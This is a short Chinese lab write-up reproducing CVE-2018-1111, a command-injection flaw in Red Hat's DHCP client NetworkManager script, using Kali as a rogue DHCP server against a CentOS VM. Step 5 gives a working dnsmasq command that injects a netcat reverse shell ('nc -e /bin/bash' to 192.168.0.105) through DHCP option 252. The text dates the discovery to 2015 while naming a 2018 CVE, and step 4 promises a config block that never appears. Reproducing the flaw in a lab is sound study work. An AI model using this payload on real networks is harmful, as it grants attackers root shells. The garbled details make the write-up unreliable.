2015年5月,在Red Hat Enterprise Linux(CVE-2018-1111)的多个版本的DHCP客户端软件包提供的NetworkManager脚本中发现了命令注入漏洞,随后,RedHat提供了相应的补丁。当系统使用含有该漏洞的NetworkManager并配置了DHCP协议时,攻击者可以利用一个恶意的DHCP服务器或者本地网络构造的DHCP响应,在该系统上以root权限执行任意命令。
复现步骤:
1.kali配置
2. centos:网络:仅主机模式
3. 关闭虚拟机仅主机模式的DHCP功能
4.卡里下配置dns文件,新建文件,加入如下代码,作为dhcp服务器:
5.kali终端下输入:•dnsmasq-dC dnsmasq.conf --dhcp-option="252,malayke'&nc -e /bin/bash192.168.0.105 4567 #"
6.复现结果